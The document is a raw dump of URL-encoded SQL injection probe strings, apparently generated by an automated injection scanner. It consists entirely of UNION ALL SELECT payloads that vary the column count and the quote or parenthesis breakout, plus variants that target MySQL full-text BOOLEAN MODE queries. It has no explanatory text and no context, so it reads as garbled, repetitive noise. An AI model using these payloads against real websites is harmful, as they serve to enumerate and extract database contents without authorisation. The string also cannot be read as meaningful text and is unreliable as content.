-3539%27%20%2B%20%28SELECT%20%27POPz%27%20WHERE%206966%3D6966%20UNION%20ALL%20SELECT%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%23%20%29%20%2B%20%27 -4739%27%20%2B%20%28SELECT%20%27pWqW%27%20WHERE%209190%3D9190%20UNION%20ALL%20SELECT%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%2C%209190%23%20%29%20%2B%20%27 -2336%27%20%2B%20%28SELECT%20%27CnfD%27%20WHERE%204546%3D4546%20UNION%20ALL%20SELECT%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%23%20%29%20%2B%20%27 -9655%27%20%2B%20%28SELECT%20%27VXaV%27%20WHERE%205595%3D5595%20UNION%20ALL%20SELECT%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%2C%205595%23%20%29%20%2B%20%27 -4186%27%20%2B%20%28SELECT%20%27AIMh%27%20WHERE%205090%3D5090%20UNION%20ALL%20SELECT%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%23%20%29%20%2B%20%27 -8059%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%2C%206729%23%20%23 -1724%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%23%20%23 -9882%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%2C%205876%23%20%23 -7845%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%2C%208054%23%20%23 -7024%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%23%20%23 -2428%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%23%20%23 -7903%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%2C%205006%23%20%23 -7933%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%2C%205768%23%20%23 -3350%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%23%20%23 -1954%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%23%20%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 